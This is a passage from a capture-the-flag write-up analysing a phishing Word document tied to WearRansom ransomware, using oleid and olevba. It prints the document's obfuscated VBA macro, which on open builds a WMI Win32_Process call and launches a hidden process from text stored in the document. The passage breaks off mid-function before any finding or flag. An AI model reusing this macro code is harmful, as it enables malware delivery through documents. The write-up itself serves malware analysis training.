emo

Description

WearRansom ransomware just got loose in our company. The SOC has traced the initial access to a phishing attack, a Word document with macros. Take a look at the document and see if you can find anything else about the malware and perhaps a flag.

Solution

└─$ unzip -l emo.zip
Archive:  emo.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   210432  2020-11-02 11:14   emo.doc
---------                     -------
   210432                     1 file
└─$ unzip -P hackthebox ./emo.zip
Archive:  ./emo.zip
  inflating: emo.doc
└─$ oleid emo.doc
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
oleid 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

Filename: emo.doc
WARNING  For now, VBA stomping cannot be detected for files in memory
--------------------+--------------------+----------+--------------------------
Indicator           |Value               |Risk      |Description
--------------------+--------------------+----------+--------------------------
File format         |MS Word 97-2003     |info      |
                    |Document or Template|          |
--------------------+--------------------+----------+--------------------------
Container format    |OLE                 |info      |Container type
--------------------+--------------------+----------+--------------------------
Application name    |Microsoft Office    |info      |Application name declared
                    |Word                |          |in properties
--------------------+--------------------+----------+--------------------------
Properties code page|1252: ANSI Latin 1; |info      |Code page used for
                    |Western European    |          |properties
                    |(Windows)           |          |
--------------------+--------------------+----------+--------------------------
Encrypted           |False               |none      |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros          |Yes, suspicious     |HIGH      |This file contains VBA
                    |                    |          |macros. Suspicious
                    |                    |          |keywords were found. Use
                    |                    |          |olevba and mraptor for
                    |                    |          |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros          |No                  |none      |This file does not contain
                    |                    |          |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External            |0                   |none      |External relationships
Relationships       |                    |          |such as remote templates,
                    |                    |          |remote OLE objects, etc
--------------------+--------------------+----------+--------------------------
└─$ olevba emo.doc
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.2 on Python 3.11.9 - http://decalage.info/python/oletools
===============================================================================
FILE: emo.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Dw75ayd2hpcab6.cls
in file: emo.doc - OLE stream: 'Macros/VBA/Dw75ayd2hpcab6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Document_open()
Get4ipjzmjfvp.X8twf_cydt6
End Sub
Function X4al3i4glox(Gav481k8nh28)
X4al3i4glox = Replace(Gav481k8nh28, "][(s)]w", Sxybmdt069cn)
End Function
-------------------------------------------------------------------------------
VBA MACRO Get4ipjzmjfvp.frm
in file: emo.doc - OLE stream: 'Macros/VBA/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function X8twf_cydt6()
On Error Resume Next
sss = Dw75ayd2hpcab6.StoryRanges.Item(1)
   Dim LIHXDt(7 + 7 + 1 + 7) As String
Set XaXiEc = (iskkZI)
Dim SnQXASH(7 + 7 + 1 + 8) As String
LIHXDt(tBPnJI) = (Sin(1) + 205 + 6595)
aDLglIF = GXOghGA
LIHXDt(tBPnJI + tBPnJI) = (aOTNpGFFJ + 5)
LIHXDt(tBPnJI + tBPnJI) = 7 + Oct(4) + pNmvqMOzY + CDbl(14) + (4 + LNEEDGz + molmtEGC + Cos(779))
Dim AJfXCG(5 + 6 + 1 + 5) As String
Set dVZiWDFGB = (eQyofECdH)
Dim wmHOBFDQ(5 + 8 + 1 + 6) As String
AJfXCG(LEwdAb) = (Sin(2) + 2 + 4791)
xQZPEUJc = YrnIBGI
AJfXCG(LEwdAb + LEwdAb) = (khBzHCG + 313)
AJfXCG(LEwdAb + LEwdAb) = 7 + Oct(3) + gmIUFwJG + CDbl(8911) + (271 + WwyPDJG + rPLnHwi + Cos(8))
E6qgao74pfq = "][(s" + ")]wro][(s)]w][(s)]wce][(s)]w" + "s][(s)]ws][(s)]w" + Xta0s1qhuxcif8qqi5
   Dim iITzHFPc(7 + 7 + 1 + 6) As String
Set JaxgAAHY = (oRmjC)
Dim XEXOGD(8 + 6 + 1 + 8) As String
iITzHFPc(XHFVEZI) = (Sin(8) + 5 + 8051)
NcVuqJG = WcJYJvH
iITzHFPc(XHFVEZI + XHFVEZI) = (LRdJJHBHD + 8)
iITzHFPc(XHFVEZI + XHFVEZI) = 9894 + Oct(9234) + bCPzCaJIa + CDbl(6) + (1 + fLVlPYdCB + wqYKEBEF + Cos(7119))
Dim DCTECB(6 + 6 + 1 + 4) As String
Set niqpCjFDA = (YCapJCq)
Dim nrNvREE(8 + 6 + 1 + 6) As String
DCTECB(eBMBDA) = (Sin(6) + 865 + 1)
FMpxY = WJKMHJHwg
DCTECB(eBMBDA + eBMBDA) = (QeFoJxC + 45)
DCTECB(eBMBDA + eBMBDA) = 6 + Oct(5) + DJchG + CDbl(78) + (6639 + mULNNfHA + WEkRFDo + Cos(3))
Op93rci3r56v3hsg = "][(s)]w][(s" + ")]w:][(s)]ww][(s)]win][(s)]w][(s)" + "]w3][(s)]w2][(s)]w_][(s)]w" + Jxjv2dzc048yq4alc6
   Dim rhGEXH(6 + 7 + 1 + 5) As String
Set VCutHNpQ = (sbyueQG)
Dim yVnFcAyf(6 + 7 + 1 + 7) As String
rhGEXH(ezhVYCDEH) = (Sin(2711) + 5 + 922)
fQjvIImF = KzxtIH
rhGEXH(ezhVYCDEH + ezhVYCDEH) = (lRdSO + 17)
rhGEXH(ezhVYCDEH + ezhVYCDEH) = 563 + Oct(8519) + omTHCD + CDbl(79) + (4 + EiDDm + jJguE + Cos(8))
Dim ZZtqYtHHF(8 + 6 + 1 + 8) As String
Set AXStgeFJ = (omtPzHDIH)
Dim YXFLBFI(7 + 6 + 1 + 7) As String
ZZtqYtHHF(kfSkHO) = (Sin(28) + 91 + 27)
SJUzsG = sKuFbE
ZZtqYtHHF(kfSkHO + kfSkHO) = (DDxjDP + 9440)
ZZtqYtHHF(kfSkHO + kfSkHO) = 3 + Oct(1914) + JELCJT + CDbl(58) + (1 + QLSVFfyT + MHVlDGdJR + Cos(6))
K8dgvsqr6fhbct6v = "][(s)]w][(s)]ww" + "][(s)]wi][(s)]wnm][(s)]w][(s)]" + "wgm][(s)]wt][(s)]w][(s)]w" + Jeo_8i41vkli6
   Dim YbriYJz(8 + 7 + 1 + 8) As String
Set RbinpE = (OfniM)
Dim TaahYEIJ(8 + 7 + 1 + 5) As String
YbriYJz(OxVPIIKHC) = (Sin(24) + 53 + 7569)
nrhaXCJ = LXNDCgC
YbriYJz(OxVPIIKHC + OxVPIIKHC) = (kKdXMAAFA + 55)
YbriYJz(OxVPIIKHC + OxVPIIKHC) = 17 + Oct(75) + bjZaA + CDbl(1) + (9063 + EoofKVZI + DdzEJ + Cos(65))
Dim hqYtBgCG(7 + 8 + 1 + 5) As String
Set aPFWgHDEC = (mJmdpA)
Dim XfkTuGBtD(8 + 6 + 1 + 8) As String
hqYtBgCG(ZdccFCG) = (Sin(51) + 2586 + 2)
nPdvTG = UosEDIDG
hqYtBgCG(ZdccFCG + ZdccFCG) = (GZuzCBBD + 462)
hqYtBgCG(ZdccFCG + ZdccFCG) = 7 + Oct(9) + eZANoxJEF + CDbl(462) + (1 + UfwtfF + ZqEnBDnz + Cos(7))
Jv2btd64ezie8rdyer = ChrW(wdKeyS)
   Dim IAfgHf(8 + 5 + 1 + 7) As String
Set ySEvH = (dPjSD)
Dim UCKMD(7 + 7 + 1 + 7) As String
IAfgHf(pbkxGAl) = (Sin(64) + 9310 + 36)
jnRKDfHGR = xQCmGFBcQ
IAfgHf(pbkxGAl + pbkxGAl) = (xHITFH + 9)
IAfgHf(pbkxGAl + pbkxGAl) = 9 + Oct(1) + DNCnGH + CDbl(8) + (2 + BAyRTA + vCVpAH + Cos(80))
Dim QcSsG(5 + 7 + 1 + 8) As String
Set bREjDuI = (xpDtBC)
Dim TCPatL(5 + 5 + 1 + 7) As String
QcSsG(MWhDgeFoD) = (Sin(11) + 4 + 970)
yxteyAHjD = pQBvJdCI
QcSsG(MWhDgeFoD + MWhDgeFoD) = (PrLzBhA + 140)
QcSsG(MWhDgeFoD + MWhDgeFoD) = 9 + Oct(3670) + ScqHd + CDbl(4) + (5662 + WovTAEU + WECuD + Cos(131))
Sd0hj_y8cq79n589qq = K8dgvsqr6fhbct6v + Jv2btd64ezie8rdyer + Op93rci3r56v3hsg + Get4ipjzmjfvp.Fwder3b7t4tqrecw + E6qgao74pfq
   Dim eMroy(7 + 8 + 1 + 8) As String
Set sCRHlln = (deZgZAIIJ)
Dim UrkCFaES(5 + 6 + 1 + 4) As String
eMroy(uantLBkI) = (Sin(2) + 6442 + 35)
zfnsDBBHC = HKVVHA
eMroy(uantLBkI + uantLBkI) = (iESFbQ + 40)
eMroy(uantLBkI + uantLBkI) = 68 + Oct(33) + kVLyjryf + CDbl(2) + (9 + BLtWQJ + yqlXFIPe + Cos(253))
Dim BTUuI(6 + 8 + 1 + 6) As String
Set YEYxCnAN = (ESQduGo)
Dim xocsPc(5 + 7 + 1 + 4) As String
BTUuI(mNOZEGRAY) = (Sin(5806) + 7 + 8)
EKqwAQBFb = TGBcB
BTUuI(mNOZEGRAY + mNOZEGRAY) = (rctZzI + 6)
BTUuI(mNOZEGRAY + mNOZEGRAY) = 3 + Oct(7313) + Rjuav + CDbl(5975) + (4 + ZKwHJAC + qtvGJj + Cos(734))
Amst4ijfvo1r0b5ium = I51m0kjl96lpdcfhm(Sd0hj_y8cq79n589qq)
   Dim RAQLJD(7 + 7 + 1 + 6) As String
Set XClJdM = (qlnJCHFGA)
Dim AyphQ(6 + 6 + 1 + 4) As String
RAQLJD(lhsUn) = (Sin(63) + 90 + 209)
QcoqUDJC = FTLUI
RAQLJD(lhsUn + lhsUn) = (KWBRJx + 649)
RAQLJD(lhsUn + lhsUn) = 37 + Oct(9) + kiCVHdO + CDbl(3) + (13 + JVsdIYZ + yWgfDMJ + Cos(1))
Dim cxCnFdBpH(5 + 5 + 1 + 5) As String
Set ouitJA = (BvjvBpF)
Dim irZVSAFEC(6 + 8 + 1 + 7) As String
cxCnFdBpH(WlIOJA) = (Sin(4585) + 7 + 1)
koqBS = lDEQYrNuX
cxCnFdBpH(WlIOJA + WlIOJA) = (RqPWyEUZ + 6)
cxCnFdBpH(WlIOJA + WlIOJA) = 5 + Oct(1694) + UQOJSE + CDbl(451) + (1970 + HNsVvpR + UGJiRH + Cos(677))
Set Rom9dzby5v3unv8 = CreateObject(Amst4ijfvo1r0b5ium)
   Dim xCJYS(8 + 8 + 1 + 4) As String
Set nUxoA = (ndgJxJ)
Dim dNstJJ(7 + 7 + 1 + 6) As String
xCJYS(lIIdsEnz) = (Sin(7) + 21 + 9823)
UqZyGgr = qgKhJhPy
xCJYS(lIIdsEnz + lIIdsEnz) = (KsNJFACB + 3841)
xCJYS(lIIdsEnz + lIIdsEnz) = 3315 + Oct(6099) + UbgTA + CDbl(3) + (2 + lTCbsIsF + GxXWH + Cos(3))
Dim duXHDX(5 + 8 + 1 + 5) As String
Set XAdCCJCDU = (wGHRsBA)
Dim OxZCo(8 + 5 + 1 + 6) As String
duXHDX(nTEhlAA) = (Sin(7) + 760 + 24)
ZXWDXr = vmNyd
duXHDX(nTEhlAA + nTEhlAA) = (NIoXO + 7502)
duXHDX(nTEhlAA + nTEhlAA) = 2 + Oct(7381) + IlwhBGGA + CDbl(64) + (73 + ssIEJuAZ + iumzCPBhV + Cos(9582))
Dbx3w8eu9966odzw7 = Mid(sss, 5, Len(sss))
   Dim iimCF(8 + 8 + 1 + 6) As String
Set cVbUEXH = (qQWMpPjJB)
Dim KbgyWgiy(6 + 8 + 1 + 5) As String
iimCF(ddFjcBZ) = (Sin(5) + 2 + 807)
NNUQCDF = EUOuI
iimCF(ddFjcBZ + ddFjcBZ) = (tliLDA + 73)
iimCF(ddFjcBZ + ddFjcBZ) = 9754 + Oct(684) + qzATa + CDbl(5439) + (3 + tPMKDxGQJ + lPrKBf + Cos(7))
Dim ZIPdEIE(7 + 5 + 1 + 8) As String
Set KhbFIAi = (pGIpm)
Dim QnvQJAvIt(6 + 8 + 1 + 5) As String
ZIPdEIE(dEIgCCLRg) = (Sin(5195) + 1 + 3)
LvpLmB = zhnZcwHAB
ZIPdEIE(dEIgCCLRg + dEIgCCLRg) = (FySxXAIH + 19)
ZIPdEIE(dEIgCCLRg + dEIgCCLRg) = 829 + Oct(214) + TxDmIs + CDbl(195) + (85 + TeLIDpFn + sPwas + Cos(9))
Gav481k8nh28 = Tvjy9j74xspx0wpf + Amst4ijfvo1r0b5ium + Jv2btd64ezie8rdyer + Get4ipjzmjfvp.Mvskm12if9c843w3 + Get4ipjzmjfvp.Cn8r2cg8i626ztt
   Dim CuHWH(5 + 6 + 1 + 8) As String
Set eZjuS = (hlQuF)
Dim lSHDSHO(5 + 5 + 1 + 4) As String
CuHWH(INihXISI) = (Sin(240) + 9382 + 6)
CeToYEFOJ = XhFNDAfH
CuHWH(INihXISI + INihXISI) = (diQIDMTEE + 9)
CuHWH(INihXISI + INihXISI) = 532 + Oct(1) + bSBYAD + CDbl(8) + (54 + dRJBFF + RKhWIioCG + Cos(1))
Dim rBbdCgGID(7 + 7 + 1 + 6) As String
Set CsfsEQDy = (tHWouERF)
Dim MFOOHtBHH(8 + 5 + 1 + 6) As String
rBbdCgGID(ZBEbaY) = (Sin(14) + 818 + 1)
xmcvJAB = unjRC
rBbdCgGID(ZBEbaY + ZBEbaY) = (hZKtHDYG + 2163)
rBbdCgGID(ZBEbaY + ZBEbaY) = 202 + Oct(2) + kxieI + CDbl(75) + (9 + VktznpCDE + xUImPFBRx + Cos(949))
Set Nzkctvs5ewy_ds = Iwfbtu1s0d782jz(Gav481k8nh28 + Get4ipjzmjfvp.Fwder3b7t4tqrecw)
   Dim uysVZGLE(6 + 7 + 1 + 8) As String
Set HrmgKC = (yFUaERwnM)
Dim DCXgo(6 + 7 + 1 + 7) As String
uysVZGLE(VODRro) = (Sin(5) + 5 + 7)
nADlCW = DxupENAFA
uysVZGLE(VODRro + VODRro) = (kYUTCCm + 8672)
uysVZGLE(VODRro + VODRro) = 486 + Oct(547) + wFXADzAJJ + CDbl(75) + (8 + EcWkCBWH + wjhXAJF + Cos(7))
Dim dhVACDD(6 + 7 + 1 + 6) As String
Set soSvHK = (wKOSWHJ)
Dim qUyfy(7 + 5 + 1 + 5) As String
dhVACDD(LfyOFtG) = (Sin(30) + 4 + 254)
nyhPC = QpscekG
dhVACDD(LfyOFtG + LfyOFtG) = (lzcwGnM + 17)
dhVACDD(LfyOFtG + LfyOFtG) = 9 + Oct(86) + cIngGbFIE + CDbl(38) + (1 + eznxDGC + WPWWJDJ + Cos(6))
   Dim tuGlEMNUH(6 + 8 + 1 + 8) As String
Set pFgxtjm = (PTyGIAEHE)
Dim hullICDx(8 + 6 + 1 + 5) As String
tuGlEMNUH(akUPoTFvY) = (Sin(1474) + 8 + 819)
KpZdJ = lYvceWGew
tuGlEMNUH(akUPoTFvY + akUPoTFvY) = (fBhoIR + 4)
tuGlEMNUH(akUPoTFvY + akUPoTFvY) = 56 + Oct(3031) + GTYmh + CDbl(5) + (27 + yqAQE + aIkGEC + Cos(258))
Dim KgVqvF(7 + 7 + 1 + 4) As String
Set dyYfmEW = (euDCT)
Dim ZFRdGCtu(7 + 6 + 1 + 7) As String
KgVqvF(HmjZbHGBE) = (Sin(5) + 7 + 3)
FBCpGGZJ = pMeqBMo
KgVqvF(HmjZbHGBE + HmjZbHGBE) = (bdxXMNBG + 6)
KgVqvF(HmjZbHGBE + HmjZbHGBE) = 9 + Oct(95) + QOBnPkFc + CDbl(13) + (114 + kyBDET + MlSxCzI + Cos(1))
   Dim crVtKHQWB(5 + 6 + 1 + 5) As String
Set zdGjPIC = (kUBBICmD)
Dim EBxxC(6 + 7 + 1 + 8) As String
crVtKHQWB(lUoRYN) = (Sin(587) + 435 + 8)
EwbcHIpDH = QJVOHPEF
crVtKHQWB(lUoRYN + lUoRYN) = (gfcPAE + 13)
crVtKHQWB(lUoRYN + lUoRYN) = 31 + Oct(1851) + mqutET + CDbl(164) + (73 + wotoAG + QNruXSC + Cos(6))
Dim YRgECF(8 + 7 + 1 + 7) As String
Set jrSuN = (asSvxGC)
Dim jmlTEGEHD(8 + 5 + 1 + 6) As String
YRgECF(rsLfMDHRI) = (Sin(1234) + 871 + 601)
urCBGDI = LPZGqW
YRgECF(rsLfMDHRI + rsLfMDHRI) = (WKBwIIx + 80)
YRgECF(rsLfMDHRI + rsLfMDHRI) = 8819 + Oct(158) + irqNf + CDbl(5) + (9 + SsmqieBVT + kFfqC + Cos(526))
Rom9dzby5v3unv8. _
Create AWLDFu7C7y(I51m0kjl96lpdcfhm(Dbx3w8eu9966odzw7)), Kw8r40ymn9ne3xu, Nzkctvs5ewy_ds
   Dim CpULFB(5 + 5 + 1 + 7) As String
Set axAfIEGRA = (QROQHnVJ)
Dim QHdoB(8 + 5 + 1 + 5) As String
CpULFB(TrBpFI) = (Sin(8) + 657 + 23)
xSnpcJCH = gtlfI
CpULFB(TrBpFI + TrBpFI) = (lsdYGbJFn + 638)
CpULFB(TrBpFI + TrBpFI) = 9806 + Oct(724) + uHfXN + CDbl(932) + (7 + sbFHIIArH + sxbtG + Cos(28))
Dim usrCDU(8 + 8 + 1 + 4) As String
Set sHuwpJH = (gWJfc)
Dim YxEfjGJ(5 + 8 + 1 + 4) As String
usrCDU(WMDxGNE) = (Sin(7) + 742 + 600)
DvEdpD = tvUMTQF
usrCDU(WMDxGNE + WMDxGNE) = (ybnwoB + 4617)
usrCDU(WMDxGNE + WMDxGNE) = 789 + Oct(98) + RkTnG + CDbl(3) + (4 + GyKLzEF + NLKIdFC + Cos(3))
   Dim fvJsBBDU(5 + 6 + 1 + 5) As String
Set dmUGJtEIO = (uydmCpg)
Dim FclRuzDG(5 + 8 + 1 + 6) As String
fvJsBBDU(HymnRVRE) = (Sin(6) + 37 + 3598)
YkQZHhJH = WpwcG
fvJsBBDU(HymnRVRE + HymnRVRE) = (qljYKHo + 385)
fvJsBBDU(HymnRVRE + HymnRVRE) = 3 + Oct(3) + xrYfDFtK + CDbl(5) + (89 + hIjOfJ + RPNhCwDC + Cos(6))
Dim qQldIhoCE(8 + 8 + 1 + 5) As String
Set rHlNGA = (xOzmLO)
Dim pNdhI(5 + 6 + 1 + 6) As String
qQldIhoCE(loWUokjFC) = (Sin(9987) + 2 + 220)
RvbYFFAfH = IUzlJJ
qQldIhoCE(loWUokjFC + loWUokjFC) = (etSoIE + 1)
qQldIhoCE(loWUokjFC + loWUokjFC) = 57 + Oct(3) + PrkTCejb + CDbl(207) + (8 + MRAMjOPB + uGpbAu + Cos(9740))
End Function
Function Iwfbtu1s0d782jz(Wvnulte_7rd74l873)
On Error Resume Next
   Dim ouUhFGIGf(5 + 7 + 1 + 5) As String
Set RlxSfHAYF = (JDFYIEIER)
Dim NAFGBBt(7 + 6 + 1 + 5) As String
ouUhFGIGf(VvufD) = (Sin(1912) + 9 + 32)
aLEvBtsA = yiBOhGPHC
ouUhFGIGf(VvufD + VvufD) = (SpCZJgIbx + 1)
ouUhFGIGf(VvufD + VvufD) = 47 + Oct(2) + JKDmHJ + CDbl(5) + (3 + ycwsIG + xFozEoBTm + Cos(4))
Dim vfVAC(7 + 7 + 1 + 7) As String
Set kWFWBISu = (FtcKEFcG)
Dim zPozC(7 + 7 + 1 + 8) As String
vfVAC(XSBMFAXy) = (Sin(5) + 7 + 804)
faeGBD = QiOaCJf
vfVAC(XSBMFAXy + XSBMFAXy) = (uOKtFrCB + 60)
vfVAC(XSBMFAXy + XSBMFAXy) = 1 + Oct(505) + kOXeC + CDbl(8) + (9 + ZxfmTDAmT + DMLyG + Cos(9))
Set Iwfbtu1s0d782jz = Rk3572j7tam4v8.Y5ruq1pwxek1348fi(I51m0kjl96lpdcfhm(A1h3yevqvs8 + Wvnulte_7rd74l873 + Hkhlqz9x9h9xvlv))
   Dim eMynDvEG(7 + 8 + 1 + 4) As String
Set bosZTe = (ZHQRDVvED)
Dim SCxUDgXHF(7 + 7 + 1 + 6) As String
eMynDvEG(qsaqdCD) = (Sin(481) + 2486 + 61)
KNHer = DzVJD
eMynDvEG(qsaqdCD + qsaqdCD) = (QVKICAHGC + 1)
eMynDvEG(qsaqdCD + qsaqdCD) = 63 + Oct(843) + rhVSHHA + CDbl(1) + (1840 + FDakJyDA + ZdugFEBSS + Cos(6))
Dim hblBI(8 + 6 + 1 + 4) As String
Set cRTStDFB = (jzfrAO)
Dim lDyKI(7 + 5 + 1 + 6) As String
hblBI(xRdCB) = (Sin(10) + 9219 + 9)
rNbDIAUS = tmRgDDGE
hblBI(xRdCB + xRdCB) = (oVNifh + 9)
hblBI(xRdCB + xRdCB) = 9 + Oct(79) + lClHEe + CDbl(115) + (688 + VbMPGQ + rqzDD + Cos(1))
Iwfbtu1s0d782jz.XSize = 0
Iwfbtu1s0d782jz.YSize = 0
   Dim fRjdFCIm(6 + 5 + 1 + 8) As String
Set yMhIFMGD = (kkoDI)
Dim mRxAL(8 + 6 + 1 + 4) As String
fRjdFCIm(XhxlCSmJE) = (Sin(46) + 8 + 484)
ocTFGCAM = ZNLRD
fRjdFCIm(XhxlCSmJE + XhxlCSmJE) = (xpdUDHB + 8)
fRjdFCIm(XhxlCSmJE + XhxlCSmJE) = 1 + Oct(36) + phOaIiI + CDbl(6) + (5 + fimLiVBCE + irpLx + Cos(4))
Dim POgWDiUG(6 + 7 + 1 + 8) As String
Set aZZkJIA = (zxAAItq)
Dim PoLDI(5 + 8 + 1 + 6) As String
POgWDiUG(qBxkBh) = (Sin(7745) + 80 + 289)
ZZaOlHYa = UsWoBEn
POgWDiUG(qBxkBh + qBxkBh) = (OlOXGbk + 1)
POgWDiUG(qBxkBh + qBxkBh) = 8870 + Oct(5) + lnibY + CDbl(46) + (570 + fOpUYSC + VZimy + Cos(329))
End Function
Function I51m0kjl96lpdcfhm(St7625txnot)
On Error Resume Next
   Dim nIMomJ(7 + 5 + 1 + 8) As String
Set mwiaJCwY = (LvplXHH)
Dim bCxOZBGJR(6 + 6 + 1 + 8) As String
nIMomJ(lQahnH) = (Sin(2) + 29 + 904)
XwJoHQ = swDDEHEDy
nIMomJ(lQahnH + lQahnH) = (GQkQDQf + 9)
nIMomJ(lQahnH + lQahnH) = 20 + Oct(3) + tATQD + CDbl(66) + (82 + DHKVEjKIS + UBGVGJDD + Cos(8048))
Dim FkCoHp(8 + 7 + 1 + 4) As String
Set fNdLD = (lXCHyAEv)
Dim ZNsIEB(5 + 5 + 1 + 6) As String
FkCoHp(LSiwbWHo) = (Sin(493) + 778 + 25)
SqrRClQBm = jZAcJp
FkCoHp(LSiwbWHo + LSiwbWHo) = (ScUjHHSkX + 6)
FkCoHp(LSiwbWHo + LSiwbWHo) = 66 + Oct(6) + ZWRjGgE + CDbl(280) + (8 + kbqbLIIH + RxjoHFC + Cos(9))
Swa7jh9qx56op58nf = (St7625txnot)
   Dim UmkRIEu(5 + 6 + 1 + 8) As String
Set jYQSjI = (JVnNDbnpC)
Dim ZWgajTo(7 + 7 + 1 + 7) As String
UmkRIEu(okgKdGCG) = (Sin(822) + 3 + 3)
wzVsH = bPaVhJDH
UmkRIEu(okgKdGCG + okgKdGCG) = (LCaMAWCHk + 934)
UmkRIEu(okgKdGCG + okgKdGCG) = 9047 + Oct(2543) + XuuEfCwWA + CDbl(7) + (9 + TFDpDAx + TpHsk + Cos(2))
Dim qwjsHJcH(7 + 5 + 1 + 7) As String
Set bjNVAA = (ymTUHIABF)
Dim XrdSyMG(8 + 5 + 1 + 8) As String
qwjsHJcH(sxcyGH) = (Sin(697) + 928 + 7)
VRTbBsA = TpZMxj
qwjsHJcH(sxcyGH + sxcyGH) = (BUIACDGtC + 9)
qwjsHJcH(sxcyGH + sxcyGH) = 3 + Oct(3493) + iFRnr + CDbl(3) + (8 + ShbgyJGE + luZZRJ + Cos(78))
Sxhaen2_r4b3crptm = Dw75ayd2hpcab6.X4al3i4glox(Swa7jh9qx56op58nf)
   Dim kdscDErj(7 + 6 + 1 + 4) As String
Set aFfpGp = (hjRTZNDGJ)
Dim zqVkuHu(6 + 7 + 1 + 6) As String
kdscDErj(BElQC) = (Sin(5) + 6 + 354)
SZbrtCp = qZHeJAD
kdscDErj(BElQC + BElQC) = (inMTLGJ + 5)
kdscDErj(BElQC + BElQC) = 86 + Oct(93) + RtKSEXETs + CDbl(237) + (2 + dwBsFG + MOwHB + Cos(2))
Dim rHyLrgvAP(6 + 8 + 1 + 6) As String
Set lscaa = (qlYFWCFA)
Dim gbwak(6 + 8 + 1 + 5) As String
rHyLrgvAP(QpIaAorpF) = (Sin(512) + 8702 + 83)
FmoXED = RQQNg
rHyLrgvAP(QpIaAorpF + QpIaAorpF) = (TTSBDUcC + 3)
rHyLrgvAP(QpIaAorpF + QpIaAorpF) = 5 + Oct(4) + iThYS + CDbl(3) + (5510 + TtcmHO + KPifuU + Cos(846))
I51m0kjl96lpdcfhm = Sxhaen2_r4b3crptm
   Dim blXJIk(6 + 5 + 1 + 8) As String
Set rqhtP = (lOtlxlA)
Dim aQkjA(6 + 8 + 1 + 4) As String
blXJIk(KWpQoCS) = (Sin(8) + 3 + 250)
fLSrFg = VAfNIJ
blXJIk(KWpQoCS + KWpQoCS) = (YkcHHEu + 8)
blXJIk(KWpQoCS + KWpQoCS) = 3 + Oct(6) + sDzaU + CDbl(6) + (1491 + zzzqCZHH + RERUEDBAD + Cos(3))
Dim qpTXy(5 + 5 + 1 + 8) As String
Set mOTdDDIJ = (vWqBlKEj)
Dim kvQxfB(5 + 8 + 1 + 6) As String
qpTXy(krBPlqzJ) = (Sin(84) + 186 + 6)
RCDZe = FyehtVb
qpTXy(krBPlqzJ + krBPlqzJ) = (WiRYhFfQ + 2144)
qpTXy(krBPlqzJ + krBPlqzJ) = 13 + Oct(1) + oyRjRH + CDbl(8) + (7 + WzEZBS + caPLFkOJl + Cos(5822))
End Function
Function T34b0j5rffcr(Ny676u98ho9ja)
Xlcdcd2bzdz8f4 = Pgmtj98xbz1mkec2y
End Function
Function AWLDFu7C7y(AMUjF5h4uz)
On Error Resume Next
Dim qpTXy(5 + 5 + 1 + 8) As String
Dim kvQxfB(5 + 8 + 1 + 6) As String
qpTXy(krBPlqzJ) = (Sin(84) + 186 + 6)
RCDZe = FyehtVb
qpTXy(krBPlqzJ + krBPlqzJ) = (WiRYhFfQ + 2144)
qpTXy(krBPlqzJ + krBPlqzJ) = 13 + Oct(1) + oyRjRH + CDbl(8) + (7 + WzEZBS + caPLFkOJl + Cos(5822))
AWLDFu7C7y = Mid(AMUjF5h4uz, 1, 50)
Dim UmkRIEu(5 + 6 + 1 + 8) As String
Set jYQSjI = (JVnNDbnpC)
Dim ZWgajTo(7 + 7 + 1 + 7) As String
UmkRIEu(okgKdGCG) = (Sin(822) + 3 + 3)
wzVsH = bPaVhJDH
UmkRIEu(okgKdGCG + okgKdGCG) = (LCaMAWCHk + 934)
UmkRIEu(okgKdGCG + okgKdGCG) = 9047 + Oct(2543) + XuuEfCwWA + CDbl(7) + (9 + TFDpDAx + TpHsk + Cos(2))
For i = 51 To Len(AMUjF5h4uz) Step 2
Dim dhVACDD(6 + 7 + 1 + 6) As String
Set soSvHK = (wKOSWHJ)
AWLDFu7C7y = AWLDFu7C7y & Mid(AMUjF5h4uz, i, 1)
Dim qUyfy(7 + 5 + 1 + 5) As String
dhVACDD(LfyOFtG) = (Sin(30) + 4 + 254)
nyhPC = QpscekG
dhVACDD(LfyOFtG + LfyOFtG) = (lzcwGnM + 17)
dhVACDD(LfyOFtG + LfyOFtG) = 9 + Oct(86) + cIngGbFIE + CDbl(38) + (1 + eznxDGC + WPWWJDJ + Cos(6))
Next i
Dim IAfgHf(8 + 5 + 1 + 7) As String
Set ySEvH = (dPjSD)
Dim UCKMD(7 + 7 + 1 + 7) As String
IAfgHf(pbkxGAl) = (Sin(64) + 9310 + 36)
jnRKDfHGR = xQCmGFBcQ
IAfgHf(pbkxGAl + pbkxGAl) = (xHITFH + 9)
IAfgHf(pbkxGAl + pbkxGAl) = 9 + Oct(1) + DNCnGH + CDbl(8) + (2 + BAyRTA + vCVpAH + Cos(80))
Dim QcSsG(5 + 7 + 1 + 8) As String
Set bREjDuI = (xpDtBC)
Dim TCPatL(5 + 5 + 1 + 7) As String
QcSsG(MWhDgeFoD) = (Sin(11) + 4 + 970)
yxteyAHjD = pQBvJdCI
QcSsG(MWhDgeFoD + MWhDgeFoD) = (PrLzBhA + 140)
QcSsG(MWhDgeFoD + MWhDgeFoD) = 9 + Oct(3670) + ScqHd + CDbl(4) + (5662 + WovTAEU + WECuD + Cos(131))
End Function
-------------------------------------------------------------------------------
VBA MACRO Rk3572j7tam4v8.bas
in file: emo.doc - OLE stream: 'Macros/VBA/Rk3572j7tam4v8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function Y5ruq1pwxek1348fi(Hy5393z_cu1)
On Error Resume Next
   Dim TAKBR(6 + 7 + 1 + 5) As String
Set ivvpvBW = (yWAMfE)
Dim rkcHF(5 + 6 + 1 + 6) As String
TAKBR(ksEsBaCtA) = (Sin(1897) + 5881 + 6)
ZOmZFY = UovwGH
TAKBR(ksEsBaCtA + ksEsBaCtA) = (jHUdBB + 44)
TAKBR(ksEsBaCtA + ksEsBaCtA) = 6 + Oct(116) + YSVfIA + CDbl(6) + (6 + MakkGA + qhhoEEA + Cos(5))
Dim ojnIHCE(7 + 5 + 1 + 7) As String
Set UuAPGAfFH = (jdxSsGH)
Dim BctfKqn(6 + 8 + 1 + 5) As String
ojnIHCE(JoDasPDE) = (Sin(8) + 6 + 40)
